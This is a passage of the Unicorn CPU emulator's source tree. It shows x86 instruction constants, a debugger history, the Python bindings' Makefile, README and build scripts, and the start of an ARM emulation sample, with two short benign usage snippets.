836; UC_X86_INS_VFMSUB213SD = 837; UC_X86_INS_VFMSUB132SD = 838; UC_X86_INS_VFMSUB231SD = 839; UC_X86_INS_VFMSUBSS = 840; UC_X86_INS_VFMSUB213SS = 841; UC_X86_INS_VFMSUB132SS = 842; UC_X86_INS_VFMSUB231SS = 843; UC_X86_INS_VFNMADD132PD = 844; UC_X86_INS_VFNMADD132PS = 845; UC_X86_INS_VFNMADDPD = 846; UC_X86_INS_VFNMADD213PD = 847; UC_X86_INS_VFNMADD231PD = 848; UC_X86_INS_VFNMADDPS = 849; UC_X86_INS_VFNMADD213PS = 850; UC_X86_INS_VFNMADD231PS = 851; UC_X86_INS_VFNMADDSD = 852; UC_X86_INS_VFNMADD213SD = 853; UC_X86_INS_VFNMADD132SD = 854; UC_X86_INS_VFNMADD231SD = 855; UC_X86_INS_VFNMADDSS = 856; UC_X86_INS_VFNMADD213SS = 857; UC_X86_INS_VFNMADD132SS = 858; UC_X86_INS_VFNMADD231SS = 859; UC_X86_INS_VFNMSUB132PD = 860; UC_X86_INS_VFNMSUB132PS = 861; UC_X86_INS_VFNMSUBPD = 862; UC_X86_INS_VFNMSUB213PD = 863; UC_X86_INS_VFNMSUB231PD = 864; UC_X86_INS_VFNMSUBPS = 865; UC_X86_INS_VFNMSUB213PS = 866; UC_X86_INS_VFNMSUB231PS = 867; UC_X86_INS_VFNMSUBSD = 868; UC_X86_INS_VFNMSUB213SD = 869; UC_X86_INS_VFNMSUB132SD = 870; UC_X86_INS_VFNMSUB231SD = 871; UC_X86_INS_VFNMSUBSS = 872; UC_X86_INS_VFNMSUB213SS = 873; UC_X86_INS_VFNMSUB132SS = 874; UC_X86_INS_VFNMSUB231SS = 875; UC_X86_INS_VFRCZPD = 876; UC_X86_INS_VFRCZPS = 877; UC_X86_INS_VFRCZSD = 878; UC_X86_INS_VFRCZSS = 879; UC_X86_INS_VORPD = 880; UC_X86_INS_VORPS = 881; UC_X86_INS_VXORPD = 882; UC_X86_INS_VXORPS = 883; UC_X86_INS_VGATHERDPD = 884; UC_X86_INS_VGATHERDPS = 885; UC_X86_INS_VGATHERPF0DPD = 886; UC_X86_INS_VGATHERPF0DPS = 887; UC_X86_INS_VGATHERPF0QPD = 888; UC_X86_INS_VGATHERPF0QPS = 889; UC_X86_INS_VGATHERPF1DPD = 890; UC_X86_INS_VGATHERPF1DPS = 891; UC_X86_INS_VGATHERPF1QPD = 892; UC_X86_INS_VGATHERPF1QPS = 893; UC_X86_INS_VGATHERQPD = 894; UC_X86_INS_VGATHERQPS = 895; UC_X86_INS_VHADDPD = 896; UC_X86_INS_VHADDPS = 897; UC_X86_INS_VHSUBPD = 898; UC_X86_INS_VHSUBPS = 899; UC_X86_INS_VINSERTF128 = 900; UC_X86_INS_VINSERTF32X4 = 901; UC_X86_INS_VINSERTF32X8 = 902; UC_X86_INS_VINSERTF64X2 = 903; UC_X86_INS_VINSERTF64X4 = 904; UC_X86_INS_VINSERTI128 = 905; UC_X86_INS_VINSERTI32X4 = 906; UC_X86_INS_VINSERTI32X8 = 907; UC_X86_INS_VINSERTI64X2 = 908; UC_X86_INS_VINSERTI64X4 = 909; UC_X86_INS_VINSERTPS = 910; UC_X86_INS_VLDDQU = 911; UC_X86_INS_VLDMXCSR = 912; UC_X86_INS_VMASKMOVDQU = 913; UC_X86_INS_VMASKMOVPD = 914; UC_X86_INS_VMASKMOVPS = 915; UC_X86_INS_VMAXPD = 916; UC_X86_INS_VMAXPS = 917; UC_X86_INS_VMAXSD = 918; UC_X86_INS_VMAXSS = 919; UC_X86_INS_VMCALL = 920; UC_X86_INS_VMCLEAR = 921; UC_X86_INS_VMFUNC = 922; UC_X86_INS_VMINPD = 923; UC_X86_INS_VMINPS = 924; UC_X86_INS_VMINSD = 925; UC_X86_INS_VMINSS = 926; UC_X86_INS_VMLAUNCH = 927; UC_X86_INS_VMLOAD = 928; UC_X86_INS_VMMCALL = 929; UC_X86_INS_VMOVQ = 930; UC_X86_INS_VMOVDDUP = 931; UC_X86_INS_VMOVD = 932; UC_X86_INS_VMOVDQA32 = 933; UC_X86_INS_VMOVDQA64 = 934; UC_X86_INS_VMOVDQA = 935; UC_X86_INS_VMOVDQU16 = 936; 
UC_X86_INS_VMOVDQU32 = 937; UC_X86_INS_VMOVDQU64 = 938; UC_X86_INS_VMOVDQU8 = 939; UC_X86_INS_VMOVDQU = 940; UC_X86_INS_VMOVHLPS = 941; UC_X86_INS_VMOVHPD = 942; UC_X86_INS_VMOVHPS = 943; UC_X86_INS_VMOVLHPS = 944; UC_X86_INS_VMOVLPD = 945; UC_X86_INS_VMOVLPS = 946; UC_X86_INS_VMOVMSKPD = 947; UC_X86_INS_VMOVMSKPS = 948; UC_X86_INS_VMOVNTDQA = 949; UC_X86_INS_VMOVNTDQ = 950; UC_X86_INS_VMOVNTPD = 951; UC_X86_INS_VMOVNTPS = 952; UC_X86_INS_VMOVSD = 953; UC_X86_INS_VMOVSHDUP = 954; UC_X86_INS_VMOVSLDUP = 955; UC_X86_INS_VMOVSS = 956; UC_X86_INS_VMOVUPD = 957; UC_X86_INS_VMOVUPS = 958; UC_X86_INS_VMPSADBW = 959; UC_X86_INS_VMPTRLD = 960; UC_X86_INS_VMPTRST = 961; UC_X86_INS_VMREAD = 962; UC_X86_INS_VMRESUME = 963; UC_X86_INS_VMRUN = 964; UC_X86_INS_VMSAVE = 965; UC_X86_INS_VMULPD = 966; UC_X86_INS_VMULPS = 967; UC_X86_INS_VMULSD = 968; UC_X86_INS_VMULSS = 969; UC_X86_INS_VMWRITE = 970; UC_X86_INS_VMXOFF = 971; UC_X86_INS_VMXON = 972; UC_X86_INS_VPABSB = 973; UC_X86_INS_VPABSD = 974; UC_X86_INS_VPABSQ = 975; UC_X86_INS_VPABSW = 976; UC_X86_INS_VPACKSSDW = 977; UC_X86_INS_VPACKSSWB = 978; UC_X86_INS_VPACKUSDW = 979; UC_X86_INS_VPACKUSWB = 980; UC_X86_INS_VPADDB = 981; UC_X86_INS_VPADDD = 982; UC_X86_INS_VPADDQ = 983; UC_X86_INS_VPADDSB = 984; UC_X86_INS_VPADDSW = 985; UC_X86_INS_VPADDUSB = 986; UC_X86_INS_VPADDUSW = 987; UC_X86_INS_VPADDW = 988; UC_X86_INS_VPALIGNR = 989; UC_X86_INS_VPANDD = 990; UC_X86_INS_VPANDND = 991; UC_X86_INS_VPANDNQ = 992; UC_X86_INS_VPANDN = 993; UC_X86_INS_VPANDQ = 994; UC_X86_INS_VPAND = 995; UC_X86_INS_VPAVGB = 996; UC_X86_INS_VPAVGW = 997; UC_X86_INS_VPBLENDD = 998; UC_X86_INS_VPBLENDMB = 999; UC_X86_INS_VPBLENDMD = 1000; UC_X86_INS_VPBLENDMQ = 1001; UC_X86_INS_VPBLENDMW = 1002; UC_X86_INS_VPBLENDVB = 1003; UC_X86_INS_VPBLENDW = 1004; UC_X86_INS_VPBROADCASTB = 1005; UC_X86_INS_VPBROADCASTD = 1006; UC_X86_INS_VPBROADCASTMB2Q = 1007; UC_X86_INS_VPBROADCASTMW2D = 1008; UC_X86_INS_VPBROADCASTQ = 1009; UC_X86_INS_VPBROADCASTW = 1010; UC_X86_INS_VPCLMULQDQ = 1011; UC_X86_INS_VPCMOV = 1012; UC_X86_INS_VPCMPB = 1013; UC_X86_INS_VPCMPD = 1014; UC_X86_INS_VPCMPEQB = 1015; UC_X86_INS_VPCMPEQD = 1016; UC_X86_INS_VPCMPEQQ = 1017; UC_X86_INS_VPCMPEQW = 1018; UC_X86_INS_VPCMPESTRI = 1019; UC_X86_INS_VPCMPESTRM = 1020; UC_X86_INS_VPCMPGTB = 1021; UC_X86_INS_VPCMPGTD = 1022; UC_X86_INS_VPCMPGTQ = 1023; UC_X86_INS_VPCMPGTW = 1024; UC_X86_INS_VPCMPISTRI = 1025; UC_X86_INS_VPCMPISTRM = 1026; UC_X86_INS_VPCMPQ = 1027; UC_X86_INS_VPCMPUB = 1028; UC_X86_INS_VPCMPUD = 1029; UC_X86_INS_VPCMPUQ = 1030; UC_X86_INS_VPCMPUW = 1031; UC_X86_INS_VPCMPW = 1032; UC_X86_INS_VPCOMB = 1033; UC_X86_INS_VPCOMD = 1034; UC_X86_INS_VPCOMPRESSD = 1035; UC_X86_INS_VPCOMPRESSQ = 1036; UC_X86_INS_VPCOMQ = 1037; UC_X86_INS_VPCOMUB = 1038; UC_X86_INS_VPCOMUD = 1039; UC_X86_INS_VPCOMUQ = 1040; UC_X86_INS_VPCOMUW = 1041; UC_X86_INS_VPCOMW = 1042; UC_X86_INS_VPCONFLICTD = 1043; UC_X86_INS_VPCONFLICTQ = 1044; UC_X86_INS_VPERM2F128 = 1045; UC_X86_INS_VPERM2I128 = 1046; UC_X86_INS_VPERMD = 1047; UC_X86_INS_VPERMI2D = 1048; UC_X86_INS_VPERMI2PD = 1049; UC_X86_INS_VPERMI2PS = 1050; UC_X86_INS_VPERMI2Q = 1051; UC_X86_INS_VPERMIL2PD = 1052; UC_X86_INS_VPERMIL2PS = 1053; UC_X86_INS_VPERMILPD = 1054; UC_X86_INS_VPERMILPS = 1055; UC_X86_INS_VPERMPD = 1056; UC_X86_INS_VPERMPS = 1057; UC_X86_INS_VPERMQ = 1058; UC_X86_INS_VPERMT2D = 1059; UC_X86_INS_VPERMT2PD = 1060; UC_X86_INS_VPERMT2PS = 1061; UC_X86_INS_VPERMT2Q = 1062; UC_X86_INS_VPEXPANDD = 1063; UC_X86_INS_VPEXPANDQ = 1064; UC_X86_INS_VPEXTRB = 1065; UC_X86_INS_VPEXTRD = 
1066; UC_X86_INS_VPEXTRQ = 1067; UC_X86_INS_VPEXTRW = 1068; UC_X86_INS_VPGATHERDD = 1069; UC_X86_INS_VPGATHERDQ = 1070; UC_X86_INS_VPGATHERQD = 1071; UC_X86_INS_VPGATHERQQ = 1072; UC_X86_INS_VPHADDBD = 1073; UC_X86_INS_VPHADDBQ = 1074; UC_X86_INS_VPHADDBW = 1075; UC_X86_INS_VPHADDDQ = 1076; UC_X86_INS_VPHADDD = 1077; UC_X86_INS_VPHADDSW = 1078; UC_X86_INS_VPHADDUBD = 1079; UC_X86_INS_VPHADDUBQ = 1080; UC_X86_INS_VPHADDUBW = 1081; UC_X86_INS_VPHADDUDQ = 1082; UC_X86_INS_VPHADDUWD = 1083; UC_X86_INS_VPHADDUWQ = 1084; UC_X86_INS_VPHADDWD = 1085; UC_X86_INS_VPHADDWQ = 1086; UC_X86_INS_VPHADDW = 1087; UC_X86_INS_VPHMINPOSUW = 1088; UC_X86_INS_VPHSUBBW = 1089; UC_X86_INS_VPHSUBDQ = 1090; UC_X86_INS_VPHSUBD = 1091; UC_X86_INS_VPHSUBSW = 1092; UC_X86_INS_VPHSUBWD = 1093; UC_X86_INS_VPHSUBW = 1094; UC_X86_INS_VPINSRB = 1095; UC_X86_INS_VPINSRD = 1096; UC_X86_INS_VPINSRQ = 1097; UC_X86_INS_VPINSRW = 1098; UC_X86_INS_VPLZCNTD = 1099; UC_X86_INS_VPLZCNTQ = 1100; UC_X86_INS_VPMACSDD = 1101; UC_X86_INS_VPMACSDQH = 1102; UC_X86_INS_VPMACSDQL = 1103; UC_X86_INS_VPMACSSDD = 1104; UC_X86_INS_VPMACSSDQH = 1105; UC_X86_INS_VPMACSSDQL = 1106; UC_X86_INS_VPMACSSWD = 1107; UC_X86_INS_VPMACSSWW = 1108; UC_X86_INS_VPMACSWD = 1109; UC_X86_INS_VPMACSWW = 1110; UC_X86_INS_VPMADCSSWD = 1111; UC_X86_INS_VPMADCSWD = 1112; UC_X86_INS_VPMADDUBSW = 1113; UC_X86_INS_VPMADDWD = 1114; UC_X86_INS_VPMASKMOVD = 1115; UC_X86_INS_VPMASKMOVQ = 1116; UC_X86_INS_VPMAXSB = 1117; UC_X86_INS_VPMAXSD = 1118; UC_X86_INS_VPMAXSQ = 1119; UC_X86_INS_VPMAXSW = 1120; UC_X86_INS_VPMAXUB = 1121; UC_X86_INS_VPMAXUD = 1122; UC_X86_INS_VPMAXUQ = 1123; UC_X86_INS_VPMAXUW = 1124; UC_X86_INS_VPMINSB = 1125; UC_X86_INS_VPMINSD = 1126; UC_X86_INS_VPMINSQ = 1127; UC_X86_INS_VPMINSW = 1128; UC_X86_INS_VPMINUB = 1129; UC_X86_INS_VPMINUD = 1130; UC_X86_INS_VPMINUQ = 1131; UC_X86_INS_VPMINUW = 1132; UC_X86_INS_VPMOVDB = 1133; UC_X86_INS_VPMOVDW = 1134; UC_X86_INS_VPMOVM2B = 1135; UC_X86_INS_VPMOVM2D = 1136; UC_X86_INS_VPMOVM2Q = 1137; UC_X86_INS_VPMOVM2W = 1138; UC_X86_INS_VPMOVMSKB = 1139; UC_X86_INS_VPMOVQB = 1140; UC_X86_INS_VPMOVQD = 1141; UC_X86_INS_VPMOVQW = 1142; UC_X86_INS_VPMOVSDB = 1143; UC_X86_INS_VPMOVSDW = 1144; UC_X86_INS_VPMOVSQB = 1145; UC_X86_INS_VPMOVSQD = 1146; UC_X86_INS_VPMOVSQW = 1147; UC_X86_INS_VPMOVSXBD = 1148; UC_X86_INS_VPMOVSXBQ = 1149; UC_X86_INS_VPMOVSXBW = 1150; UC_X86_INS_VPMOVSXDQ = 1151; UC_X86_INS_VPMOVSXWD = 1152; UC_X86_INS_VPMOVSXWQ = 1153; UC_X86_INS_VPMOVUSDB = 1154; UC_X86_INS_VPMOVUSDW = 1155; UC_X86_INS_VPMOVUSQB = 1156; UC_X86_INS_VPMOVUSQD = 1157; UC_X86_INS_VPMOVUSQW = 1158; UC_X86_INS_VPMOVZXBD = 1159; UC_X86_INS_VPMOVZXBQ = 1160; UC_X86_INS_VPMOVZXBW = 1161; UC_X86_INS_VPMOVZXDQ = 1162; UC_X86_INS_VPMOVZXWD = 1163; UC_X86_INS_VPMOVZXWQ = 1164; UC_X86_INS_VPMULDQ = 1165; UC_X86_INS_VPMULHRSW = 1166; UC_X86_INS_VPMULHUW = 1167; UC_X86_INS_VPMULHW = 1168; UC_X86_INS_VPMULLD = 1169; UC_X86_INS_VPMULLQ = 1170; UC_X86_INS_VPMULLW = 1171; UC_X86_INS_VPMULUDQ = 1172; UC_X86_INS_VPORD = 1173; UC_X86_INS_VPORQ = 1174; UC_X86_INS_VPOR = 1175; UC_X86_INS_VPPERM = 1176; UC_X86_INS_VPROTB = 1177; UC_X86_INS_VPROTD = 1178; UC_X86_INS_VPROTQ = 1179; UC_X86_INS_VPROTW = 1180; UC_X86_INS_VPSADBW = 1181; UC_X86_INS_VPSCATTERDD = 1182; UC_X86_INS_VPSCATTERDQ = 1183; UC_X86_INS_VPSCATTERQD = 1184; UC_X86_INS_VPSCATTERQQ = 1185; UC_X86_INS_VPSHAB = 1186; UC_X86_INS_VPSHAD = 1187; UC_X86_INS_VPSHAQ = 1188; UC_X86_INS_VPSHAW = 1189; UC_X86_INS_VPSHLB = 1190; UC_X86_INS_VPSHLD = 1191; UC_X86_INS_VPSHLQ = 1192; UC_X86_INS_VPSHLW = 1193; 
UC_X86_INS_VPSHUFB = 1194; UC_X86_INS_VPSHUFD = 1195; UC_X86_INS_VPSHUFHW = 1196; UC_X86_INS_VPSHUFLW = 1197; UC_X86_INS_VPSIGNB = 1198; UC_X86_INS_VPSIGND = 1199; UC_X86_INS_VPSIGNW = 1200; UC_X86_INS_VPSLLDQ = 1201; UC_X86_INS_VPSLLD = 1202; UC_X86_INS_VPSLLQ = 1203; UC_X86_INS_VPSLLVD = 1204; UC_X86_INS_VPSLLVQ = 1205; UC_X86_INS_VPSLLW = 1206; UC_X86_INS_VPSRAD = 1207; UC_X86_INS_VPSRAQ = 1208; UC_X86_INS_VPSRAVD = 1209; UC_X86_INS_VPSRAVQ = 1210; UC_X86_INS_VPSRAW = 1211; UC_X86_INS_VPSRLDQ = 1212; UC_X86_INS_VPSRLD = 1213; UC_X86_INS_VPSRLQ = 1214; UC_X86_INS_VPSRLVD = 1215; UC_X86_INS_VPSRLVQ = 1216; UC_X86_INS_VPSRLW = 1217; UC_X86_INS_VPSUBB = 1218; UC_X86_INS_VPSUBD = 1219; UC_X86_INS_VPSUBQ = 1220; UC_X86_INS_VPSUBSB = 1221; UC_X86_INS_VPSUBSW = 1222; UC_X86_INS_VPSUBUSB = 1223; UC_X86_INS_VPSUBUSW = 1224; UC_X86_INS_VPSUBW = 1225; UC_X86_INS_VPTESTMD = 1226; UC_X86_INS_VPTESTMQ = 1227; UC_X86_INS_VPTESTNMD = 1228; UC_X86_INS_VPTESTNMQ = 1229; UC_X86_INS_VPTEST = 1230; UC_X86_INS_VPUNPCKHBW = 1231; UC_X86_INS_VPUNPCKHDQ = 1232; UC_X86_INS_VPUNPCKHQDQ = 1233; UC_X86_INS_VPUNPCKHWD = 1234; UC_X86_INS_VPUNPCKLBW = 1235; UC_X86_INS_VPUNPCKLDQ = 1236; UC_X86_INS_VPUNPCKLQDQ = 1237; UC_X86_INS_VPUNPCKLWD = 1238; UC_X86_INS_VPXORD = 1239; UC_X86_INS_VPXORQ = 1240; UC_X86_INS_VPXOR = 1241; UC_X86_INS_VRCP14PD = 1242; UC_X86_INS_VRCP14PS = 1243; UC_X86_INS_VRCP14SD = 1244; UC_X86_INS_VRCP14SS = 1245; UC_X86_INS_VRCP28PD = 1246; UC_X86_INS_VRCP28PS = 1247; UC_X86_INS_VRCP28SD = 1248; UC_X86_INS_VRCP28SS = 1249; UC_X86_INS_VRCPPS = 1250; UC_X86_INS_VRCPSS = 1251; UC_X86_INS_VRNDSCALEPD = 1252; UC_X86_INS_VRNDSCALEPS = 1253; UC_X86_INS_VRNDSCALESD = 1254; UC_X86_INS_VRNDSCALESS = 1255; UC_X86_INS_VROUNDPD = 1256; UC_X86_INS_VROUNDPS = 1257; UC_X86_INS_VROUNDSD = 1258; UC_X86_INS_VROUNDSS = 1259; UC_X86_INS_VRSQRT14PD = 1260; UC_X86_INS_VRSQRT14PS = 1261; UC_X86_INS_VRSQRT14SD = 1262; UC_X86_INS_VRSQRT14SS = 1263; UC_X86_INS_VRSQRT28PD = 1264; UC_X86_INS_VRSQRT28PS = 1265; UC_X86_INS_VRSQRT28SD = 1266; UC_X86_INS_VRSQRT28SS = 1267; UC_X86_INS_VRSQRTPS = 1268; UC_X86_INS_VRSQRTSS = 1269; UC_X86_INS_VSCATTERDPD = 1270; UC_X86_INS_VSCATTERDPS = 1271; UC_X86_INS_VSCATTERPF0DPD = 1272; UC_X86_INS_VSCATTERPF0DPS = 1273; UC_X86_INS_VSCATTERPF0QPD = 1274; UC_X86_INS_VSCATTERPF0QPS = 1275; UC_X86_INS_VSCATTERPF1DPD = 1276; UC_X86_INS_VSCATTERPF1DPS = 1277; UC_X86_INS_VSCATTERPF1QPD = 1278; UC_X86_INS_VSCATTERPF1QPS = 1279; UC_X86_INS_VSCATTERQPD = 1280; UC_X86_INS_VSCATTERQPS = 1281; UC_X86_INS_VSHUFPD = 1282; UC_X86_INS_VSHUFPS = 1283; UC_X86_INS_VSQRTPD = 1284; UC_X86_INS_VSQRTPS = 1285; UC_X86_INS_VSQRTSD = 1286; UC_X86_INS_VSQRTSS = 1287; UC_X86_INS_VSTMXCSR = 1288; UC_X86_INS_VSUBPD = 1289; UC_X86_INS_VSUBPS = 1290; UC_X86_INS_VSUBSD = 1291; UC_X86_INS_VSUBSS = 1292; UC_X86_INS_VTESTPD = 1293; UC_X86_INS_VTESTPS = 1294; UC_X86_INS_VUNPCKHPD = 1295; UC_X86_INS_VUNPCKHPS = 1296; UC_X86_INS_VUNPCKLPD = 1297; UC_X86_INS_VUNPCKLPS = 1298; UC_X86_INS_VZEROALL = 1299; UC_X86_INS_VZEROUPPER = 1300; UC_X86_INS_WAIT = 1301; UC_X86_INS_WBINVD = 1302; UC_X86_INS_WRFSBASE = 1303; UC_X86_INS_WRGSBASE = 1304; UC_X86_INS_WRMSR = 1305; UC_X86_INS_XABORT = 1306; UC_X86_INS_XACQUIRE = 1307; UC_X86_INS_XBEGIN = 1308; UC_X86_INS_XCHG = 1309; UC_X86_INS_XCRYPTCBC = 1310; UC_X86_INS_XCRYPTCFB = 1311; UC_X86_INS_XCRYPTCTR = 1312; UC_X86_INS_XCRYPTECB = 1313; UC_X86_INS_XCRYPTOFB = 1314; UC_X86_INS_XEND = 1315; UC_X86_INS_XGETBV = 1316; UC_X86_INS_XLATB = 1317; UC_X86_INS_XRELEASE = 1318; UC_X86_INS_XRSTOR = 1319; 
UC_X86_INS_XRSTOR64 = 1320; UC_X86_INS_XRSTORS = 1321; UC_X86_INS_XRSTORS64 = 1322; UC_X86_INS_XSAVE = 1323; UC_X86_INS_XSAVE64 = 1324; UC_X86_INS_XSAVEC = 1325; UC_X86_INS_XSAVEC64 = 1326; UC_X86_INS_XSAVEOPT = 1327; UC_X86_INS_XSAVEOPT64 = 1328; UC_X86_INS_XSAVES = 1329; UC_X86_INS_XSAVES64 = 1330; UC_X86_INS_XSETBV = 1331; UC_X86_INS_XSHA1 = 1332; UC_X86_INS_XSHA256 = 1333; UC_X86_INS_XSTORE = 1334; UC_X86_INS_XTEST = 1335; UC_X86_INS_FDISI8087_NOP = 1336; UC_X86_INS_FENI8087_NOP = 1337; UC_X86_INS_ENDING = 1338;

implementation

end.

unicorn-2.1.1/bindings/python/.gdb_history

q rr r bt b tcg.c:3075 r p ts p *ts bt q b translate.c:4810 r q r b translate.c:4810 frame level 5 frame level 7 q r bt q r bt q r bt b translate.c:4810 r p/x s->pc n n n n n n n n p/x aflag n n n p/x dflag n n n n p/x f n s n n n n n n n n n n n n n n n q r bt q r bt frame level 7 p/x op p op p *op q b tcg_optimize r b tcg_optimize_x86_64 r n s s s q r exit b tcg_dump_ops r b tcg_dump_ops b tcg_dump_ops_x86_64 r b tcg_optimize_x86_64 r b tcg_optimize_x86_64 r b tcg_optimize_x86_64 r b print_log r b print_log r f fprintf q b write r bt q

unicorn-2.1.1/bindings/python/MANIFEST.in

recursive-include src *
recursive-include prebuilt *
include LICENSE.TXT
include README.TXT
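The UC_X86_INS_* values above close out the x86 instruction enum for the Pascal bindings; the Python bindings expose the same numbering through unicorn.x86_const. Only a handful of these IDs (IN, OUT, SYSCALL, SYSENTER, CPUID and friends) are accepted by UC_HOOK_INSN. A minimal sketch of hooking SYSCALL by its instruction ID, using an arbitrary base address (this snippet is illustrative and not a file from the repository):

```python
from unicorn import Uc, UC_ARCH_X86, UC_MODE_64, UC_HOOK_INSN
from unicorn.x86_const import UC_X86_INS_SYSCALL, UC_X86_REG_RAX

BASE = 0x1000

def hook_syscall(uc, user_data):
    # Fires only for the instruction ID registered below.
    print(">>> got SYSCALL with RAX = 0x%x" % uc.reg_read(UC_X86_REG_RAX))

mu = Uc(UC_ARCH_X86, UC_MODE_64)
mu.mem_map(BASE, 0x1000)
mu.mem_write(BASE, b"\x0f\x05")  # syscall
mu.reg_write(UC_X86_REG_RAX, 0x3C)
# Same positional form as the MRS hook in sample_arm64.py below.
mu.hook_add(UC_HOOK_INSN, hook_syscall, None, 1, 0, UC_X86_INS_SYSCALL)
mu.emu_start(BASE, BASE + 2)
```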
unicorn-2.1.1/bindings/python/Makefile

# Python binding for Unicorn engine. Nguyen Anh Quynh <aquynh@gmail.com>

.PHONY: gen_const install install3 clean sdist sdist3 bdist bdist3 sdist_win bdist_win

gen_const:
	cd .. && python3 const_generator.py python

install:
	rm -rf src/ dist/
	rm -rf prebuilt/win64/unicorn.dll
	rm -rf prebuilt/win32/unicorn.dll
	if test -n "${DESTDIR}"; then \
		python3 setup.py install --root="${DESTDIR}"; \
	else \
		python3 setup.py install; \
	fi

install3:
	rm -rf src/ dist/
	rm -rf prebuilt/win64/unicorn.dll
	rm -rf prebuilt/win32/unicorn.dll
	if test -n "${DESTDIR}"; then \
		python3 setup.py install --root="${DESTDIR}"; \
	else \
		python3 setup.py install; \
	fi

# build & upload PyPI package with source code of the core
sdist:
	rm -rf src/ dist/
	rm -rf prebuilt/win64/unicorn.dll
	rm -rf prebuilt/win32/unicorn.dll
	python3 setup.py sdist register upload

# build & upload PyPI package with source code of the core
sdist3:
	rm -rf src/ dist/
	rm -rf prebuilt/win64/unicorn.dll
	rm -rf prebuilt/win32/unicorn.dll
	python3 setup.py sdist register upload

# build & upload PyPI package with precompiled core
bdist:
	rm -rf src/ dist/
	rm -rf prebuilt/win64/unicorn.dll
	rm -rf prebuilt/win32/unicorn.dll
	python3 setup.py bdist_wheel register upload

# build & upload PyPI package with precompiled core
bdist3:
	rm -rf src/ dist/
	rm -rf prebuilt/win64/unicorn.dll
	rm -rf prebuilt/win32/unicorn.dll
	python3 setup.py bdist_wheel register upload

# build & upload PyPI package with prebuilt core
# NOTE: be sure to have the precompiled core under prebuilt/win*/ beforehand
sdist_win:
	rm -rf src/ dist/
	python3 setup.py sdist register upload

# build & upload PyPI package with prebuilt core
# NOTE: be sure to have the precompiled core under prebuilt/win*/ beforehand
sdist3_win:
	rm -rf src/ dist/
	python3 setup.py sdist register upload

clean:
	rm -rf src/ dist/ build/ MANIFEST
	rm -rf prebuilt/win64/unicorn.dll
	rm -rf prebuilt/win32/unicorn.dll
	rm -rf unicorn/lib unicorn/include
	rm -rf unicorn/*.pyc
	rm -rf unicorn.egg-info

SAMPLES = sample_arm.py sample_arm64.py sample_mips.py
SAMPLES += sample_sparc.py sample_m68k.py sample_x86.py

check:
	@for t in $(SAMPLES); do \
		echo Check $$t ...; \
		./$$t > /dev/null && echo OK || echo FAILED; \
	done

unicorn-2.1.1/bindings/python/README.md

# Python Bindings for Unicorn

Originally written by Nguyen Anh Quynh, polished and redesigned by elicn, maintained by all community contributors.

## Install

Install a prebuilt wheel from PyPI:

```bash
pip3 install unicorn
```

In case you would like to develop the bindings:

```bash
# Python3
DEBUG=1 THREADS=4 pip3 install --user -e .
# Workaround for Pylance
DEBUG=1 THREADS=4 pip3 install --user -e . --config-settings editable_mode=strict
# Python2
DEBUG=1 THREADS=4 pip install -e .
```

or install it by building it yourself:

```bash
# Python3
THREADS=4 pip3 install --user .
# Python2, unfortunately `pip2` doesn't support in-tree build
THREADS=4 python3 setup.py install
```

Explanations for arguments:

- `THREADS=4` will use 4 threads for building.
- `DEBUG=1` will build a debug version of unicorn.
- `--user` will install the bindings to your user directory instead of requiring root permission.
- `-e` infers the editable mode, which gives you instant feedback instead of re-compiling every time.

Note that you should set up a valid build environment according to docs/COMPILE.md, but you don't necessarily have to build the core yourself, because `setup.py` will do this for you.

## Python2 compatibility

By default, the Unicorn Python bindings are maintained against Python3, as it offers more powerful features that improve development efficiency. Meanwhile, for Python2, Unicorn will only stay compatible with the features that Unicorn1 offers, because Python2 had already reached end-of-life more than 3 years before this README was written.

While offering all features for both Python2 & Python3 is desirable and doable, it inevitably costs too much effort to maintain, and few users really rely on this. Therefore, we assume that if users still stick to Python2, the previous Unicorn1 features we offer should be enough. If you really want some new features Unicorn2 offers, please check and send a pull request to `unicorn/unicorn_py2`. We are happy to review and accept!

unicorn-2.1.1/bindings/python/build_wheel.sh

#!/bin/bash
set -e -x

cd bindings/python

# Compile wheels
python3.7 setup.py bdist_wheel $@

cd dist

# We can't repair an aarch64 wheel on x64 hosts
# https://github.com/pypa/auditwheel/issues/244
if [[ ! "$*" =~ "aarch64" ]]; then
    auditwheel repair *.whl
    mv -f wheelhouse/*.whl .
fi

unicorn-2.1.1/bindings/python/musl_wheel.sh

#!/bin/sh

# TODO: use cibuildwheel
apk update
apk add gcc make cmake pkgconfig linux-headers git musl-dev patchelf

python3 -m pip install -U pip setuptools auditwheel

cd bindings/python && python3 setup.py bdist_wheel && auditwheel repair dist/*.whl && mv -f wheelhouse/*.whl ./dist/
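A quick way to sanity-check whatever wheel these scripts produce (or the one installed from PyPI per the README above) is a tiny end-to-end emulation. This is a sketch with an arbitrary address and code byte, not a file from the repository:

```python
import unicorn
from unicorn import Uc, UC_ARCH_X86, UC_MODE_32
from unicorn.x86_const import UC_X86_REG_ECX

BASE = 0x1000

mu = Uc(UC_ARCH_X86, UC_MODE_32)
mu.mem_map(BASE, 0x1000)
mu.mem_write(BASE, b"\x41")  # inc ecx
mu.reg_write(UC_X86_REG_ECX, 0x10)
mu.emu_start(BASE, BASE + 1)

assert mu.reg_read(UC_X86_REG_ECX) == 0x11
print("unicorn %s OK" % unicorn.__version__)
```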
unicorn-2.1.1/bindings/python/prebuilt/.gitkeep

unicorn-2.1.1/bindings/python/sample_all.sh

#!/bin/sh
python3 ./sample_arm.py
echo "=========================="
python3 ./sample_armeb.py
echo "=========================="
python3 ./sample_arm64.py
echo "=========================="
python3 ./sample_arm64eb.py
echo "=========================="
python3 ./sample_m68k.py
echo "=========================="
python3 ./sample_mips.py
echo "=========================="
python3 ./sample_ppc.py
echo "=========================="
python3 ./sample_riscv.py
echo "=========================="
python3 ./sample_s390x.py
echo "=========================="
python3 ./sample_sparc.py
echo "=========================="
python3 ./sample_tricore.py
echo "=========================="
python3 ./sample_x86.py
echo "=========================="
python3 ./shellcode.py
echo "=========================="
python3 ./sample_ctl.py
echo "=========================="
python3 ./sample_network_auditing.py

unicorn-2.1.1/bindings/python/sample_arm.py

#!/usr/bin/env python
# Sample code for ARM of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com>
# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com>

from __future__ import print_function
from unicorn import *
from unicorn.arm_const import *

# code to be emulated
ARM_CODE = b"\x37\x00\xa0\xe3\x03\x10\x42\xe0"  # mov r0, #0x37; sub r1, r2, r3
THUMB_CODE = b"\x83\xb0"  # sub sp, #0xc

# memory address where emulation starts
ADDRESS = 0x10000


# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size))


